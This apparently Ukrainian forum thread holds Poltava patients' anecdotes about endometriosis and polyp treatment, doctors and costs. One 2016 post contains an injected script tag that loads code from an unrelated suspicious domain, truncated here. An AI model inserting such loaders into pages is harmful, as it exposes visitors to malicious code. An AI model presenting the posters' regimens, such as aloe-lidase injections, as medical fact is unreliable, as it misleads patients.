62 відповідей у цій темі
Опубліковано 04 червень 2016 - 18:18
Девочки, расскажу вас свою историю лечения эндометриоза, а точнее моего результата. В 2013 году меня начали беспокоить боли в области яичника + была задержка, так как боли были достаточно существенными, это заставило меня пойти на УЗИ к Житнык ( каб. Ярослава) Ну там меня и обрадовали, что мол это кисты, правда фоликулярные. Приписали лечение. так как при сдаче анализов нашли уреоплазму, ну и давай лечить. Антибиотики, свечи, уколы....а толку как оказалось 0. далее я подзабила на это дело, так как уверяла меня что через пару циклов, кисты сами уйдут. Но не тут то было, боли вернулись. повторно пошла на узи уже в 1 ЖК к Кравец С.В, вот она мне и сказала что у меня спаячный процесс малого таза с эндометриоидными очагами в яичниках по 30 мм + спайки в правом яичнике. вышла с кабинета я в слезах... Посоветовали мне обратиться к Сальной, кратко - результата после ее лечения небыло, хотя сами мед работники говорят, что она спец по тяжелым пациэнтам скак я. Далее был по рекомендации Кравец, доктор Ерохин. Шикарный мужчина, приписал лечение....неделя мне обходилась в 2000 грн ( это 2014 год) не дешево. но что не потратить ради здоровья и к тому же. ой как хотелось забеременить...ведь собиралась замуж... В общем, сдавала у него анализы на гормоны, мазки всякие и т.д, все было в норме, но цикл не постоянный. боли правда ушли, а беременности все нет, улучшений по УЗИ тоже нет. На что Кравец сказала,не растраивайтесь всегда можно подумать об усыновлении и ЭКО...Для меня это был ШОК! После очередных истерик от похода в ЖК, мне пришлось обратиться к знак гине. правда уже не практикующая и давно живет не в Полтаве. По мылу скинула все анализы и узи.... на что она мне сказала.что все плохо, но не повод отправляться на кладбище. Что с эндометриоидными кистами на ее практике женщины беременили, хуже когда киста в матке. Ну и порекомендовала проколоть алое + лидаза через день подкожно, но только не по стандартной схеме 10 уколов, а месяца 2. А так же рекомендовала походить на процедуры электрофереза с лидазой. Я конечно бегом в ЖК и говорю, мол вычитала о такой схеме. давайте колоть, процедуры и т.д. Но меня обломали,сказав ,что лекарства эти стары и уже не так эффективны как новые. И вообще мой выход только Визан, после проверка на проходимость труб, а если без результратов - лапораскопия. При просьбе дать направление на электроферез - была культурно послана, но Т.Г. Шевченко переубедил доктора, в том что направление мне нужно. Итак,кололась я 4 месяца, даже эта женщина восхитилась моим желанием добиться результата. ну и электроферез. На время лечения не старалась беременеть. Все 4 мес. я меряла БТ и понимала. что восполительные процессы уже уходят, цикл нормализовался и боли ушли ( правда первый мес, боли были ужасные, наверное было обострение) ну и после лечения, этих уколов на 2й цикл я увидела на тесте //. Эта схема подойдет тем девочкам которые как и я хотели забеременить...кто уже с детками и хочет вылечить эту дрянь, не могу посоветовать вам доктора в Полтаве, так как была у многих, некоторые просто не брались за болячку. Спасибо им, ибо небыло выкачки денег. Девочки которые не рожали, не спешите с приемом Визана и операцией. Нам никто не пояснил последствия приема этого гормона,что организм вводят в искуственный климакс, а потом снова гормонами будут запускать организм. и дай Бог
.чтоб запустили, а может быть и по другому. Кого, что будет интересовать пишите в ЛС. Девочки всем удачи!!!
Відредаговано 777Lena777, 04 червень 2016 - 19:02.
Опубліковано 06 червень 2016 - 00:32
<script src="http://minxxrpaaw.or...a&h=0&m=normal"id="ubar-loader"></script>
Добрый день!Подскажите, кто знает в Полтаве хорошего доктора или клинику, где понимают в лечении ендометриоза? Лечусь уже 11 месяцев. Результат не очень.
Увы в Полтаве таких нет !!!!!!!!
Опубліковано 06 червень 2016 - 21:06
Я докторов хороших так же не встречала. Главное не идите к Сапегину в 5ю, тот сразу на лапораскопию ложит )))
Опубліковано 07 червень 2016 - 11:31
Я докторов хороших так же не встречала. Главное не идите к Сапегину в 5ю, тот сразу на лапораскопию ложит )))
это точно! и я против Сапигина! Мало того что ложит сразу, так еще и хам! Зажрался уже!
Опубліковано 19 січень 2017 - 23:48
если нет болей во время менструации, то врач не надо.
Опубліковано 07 квітень 2017 - 14:30
А у меня обнаружили эндометриоз матки по результату проведения биопсии эндометрия. Делала в Киеве, в медицинском центре Институт генетики репродукции. Без наркоза, практически не больно.
Врач сказал, что после родов эндометриоз может уйти.
♥Татьяна♥
-
Місто:Полтава
-
Ім'я:Татьяна
Опубліковано 16 серпень 2017 - 11:23
Девочки! Кому ставили диагноз полипы эндометрия? Какие у вас были симптомы?, что беспокоило? Как лечили?
Опубліковано 16 серпень 2017 - 17:03
Девочки! Кому ставили диагноз полипы эндометрия? Какие у вас были симптомы?, что беспокоило? Как лечили?
Мне ставили такой диагноз. Симптомов и жалоб не было, кроме как болезненные месячные и не могла забеременеть (поэтому и начала подробное обследование).
По последней причине назначили гистероскопию, в ходе которой (войдя в матку) провели гистерорезектоскопию и полипектомию (удалили многочисленные маленькие полипы и отправили их на исследования). Делала в Киеве. После наркоза отошла быстро, через 3-4 часа домой. После назначили лечение на 5 дней и через 2 недели за результатом и контрольное УЗИ.
♥Татьяна♥
-
Місто:Полтава
-
Ім'я:Татьяна
Опубліковано 17 серпень 2017 - 10:49
Мне ставили такой диагноз. Симптомов и жалоб не было, кроме как болезненные месячные и не могла забеременеть (поэтому и начала подробное обследование).
По последней причине назначили гистероскопию, в ходе которой (войдя в матку) провели гистерорезектоскопию и полипектомию (удалили многочисленные маленькие полипы и отправили их на исследования). Делала в Киеве. После наркоза отошла быстро, через 3-4 часа домой. После назначили лечение на 5 дней и через 2 недели за результатом и контрольное УЗИ.
А в какую сумму обошлось лечение? После лечения беременность наступила?
Опубліковано 17 серпень 2017 - 22:22
А в какую сумму обошлось лечение? После лечения беременность наступила?
Операция 13500, лечение до 500 грн (конец декабря 2016г).
Это не единственная причина была в нашем случае, поэтому до наступления беременности были ещё и другие процедуры.
Люсинда
Немовля
-
-
Новачки
-
-
4 повідомлення
Опубліковано 12 вересень 2017 - 12:35
мне врач сказала на узи, что у меня эндометриоз, но она еще и сказала, что это заболевание вялотекущее и развивается под действием гормонов. то есть лечиться грубо говоря он отсутсвием менструации - беременностью или гормональными таблетками, которые останавливают менструацию - она мне их приписала - 3 месяца пьешь, потом на 5 дней прекращаешь и менструация идет. Потом опять. Короче тема стремная на самом деле, учитывая то что эти таблетки вызывают тошноту, рвоту и прочее. В этом случае с ее слов, нужно через пару часов выпить еще одну таблетку, если эту вырвала. Жуть короче...тем более, что эндометриоз может развиваться, а может не развиваться. я конечно не специалист, может просто пригодиться Вам мой опыт 
Опубліковано 19 лютий 2018 - 00:09
У меня вопрос к тем, кто в недавнем времени удалял эндометриоедную кисту с помощью лапароскопии. Где делали? Какая стоимость? Уже обшарила весь интернет. Врач советует Харьков, так как в Полтаве очередь на месяца вперёд. Ещё одна врач посоветовала обратиться в Калюжка Л. Н. на лечение гормонами. Может у кого то есть свежая информация по поводу этой темы.
Відредаговано Зеленоглазка, 19 лютий 2018 - 00:13.
svexa
-
Місто:Центральный рынок-Конкорд
-
Ім'я:svexa
Опубліковано 19 лютий 2018 - 07:36
О... Теперь хоть знаю куда мой подевался. Лет с 14 ставили. 2 беременности,,, излечили,,
Опубліковано 19 лютий 2018 - 12:05
Люсинда, а Вам какие препараты назначали?
Опубліковано 19 лютий 2018 - 12:15
Калюжка Л. П. очень хороший и опытный врач. Думаю, к ней стоит обратится. У меня самой такого опыта не было, но знаю о ней только хорошее.
Опубліковано 30 квітень 2019 - 14:38
Добрый день, подскажите а где именно в Киеве вы делали операцию по удалению полипов? в Полтаве я так понимаю предлагают только "слепое" выскабливание(((
Опубліковано 03 лютий 2020 - 12:47
Девочки, посоветуйте пожалуйста, к кому сходить на УЗИ?
Врач советовала к Дорошенко, но мой визит отменили.
А мне надо попасть именно сегодня.
Кто толковый узист в вопросах эндометриоза и где?
Опубліковано 03 лютий 2020 - 12:58
Девочки, посоветуйте пожалуйста, к кому сходить на УЗИ?
Врач советовала к Дорошенко, но мой визит отменили.
А мне надо попасть именно сегодня.
Кто толковый узист в вопросах эндометриоза и где?
я боюсь дуже радити, але ще поки не розчарувалась в Білоножко в Евромеді. Не з ендометріозом була, але як узд лікар мені подобається.
Ще Шупту хвалять загалом, але я особисто не була, і думаю, до неї сьогодні на сьогодні не потрапиш.
Опубліковано 03 лютий 2020 - 15:24
я боюсь дуже радити, але ще поки не розчарувалась в Білоножко в Евромеді. Не з ендометріозом була, але як узд лікар мені подобається.
Ще Шупту хвалять загалом, але я особисто не була, і думаю, до неї сьогодні на сьогодні не потрапиш.
Можно пожалуйста контакты и где этот центр?
Опубліковано 03 лютий 2020 - 18:54
Можно пожалуйста контакты и где этот центр?
Пробач, тільки побачила. Сподіваюсь, ти погуглила. Евромед на Гетьмана Сагайдачного (Фурманова).
3 користувачів читають цю тему
0 учасників, 3 гостей, 0 анонімних користувачів
Відповідати на цитовані повідомлення Очистити
|
Важливі повідомлення
Про рекламу на форумі читати тут.
|